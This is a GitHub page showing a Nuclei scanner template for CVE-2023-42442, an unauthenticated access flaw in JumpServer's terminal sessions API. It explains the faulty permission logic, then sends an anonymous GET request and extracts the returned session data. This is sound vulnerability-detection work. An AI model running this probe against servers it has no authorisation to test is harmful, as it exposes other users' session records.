-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathjumpserver-unauth.yaml
41 lines (38 loc) · 1.63 KB
/
jumpserver-unauth.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
id: CVE-2023-42442-esonhugh
info:
name: JumpServer v3.0.0 - v3.6.3 terminal session api broken access control
author: Esonhugh
severity: high
tags: jumpserver,unauth,access control
description: |
The api /api/v1/terminal/sessions/ permission control is broken and can be accessed anonymously.
https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91
class SessionViewSet(OrgBulkModelViewSet):
permission_classes = [RBACPermission | IsSessionAssignee]
https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/permissions.py#L10
class IsSessionAssignee(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
class BasePermission:
def has_permission(self, request, view):
return True
SessionViewSet permission classes set to [RBACPermission | IsSessionAssignee], relation is or, so any permission matched will be allowed. IsSessionAssignee inherit from BasePermission, BasePermission default has_permission set to True,and not awared this at that time.
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/terminal/sessions/?limit=10"
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- '"id"'
- '"user"'
- '"terminal"'
extractors:
- type: dsl
name: termianl-data
dsl:
- "body"
# digest: 490a004630440220602a5c8db758a92a8387391edf72d87e672970b78344ed1ca10a576a4d0db8e00220356fa18b79abd61da37107835a4fa9dbd5c45f3f52ead4a2ec03fe204808c587:569246fd1e83ae0648e1a21ffb4fe811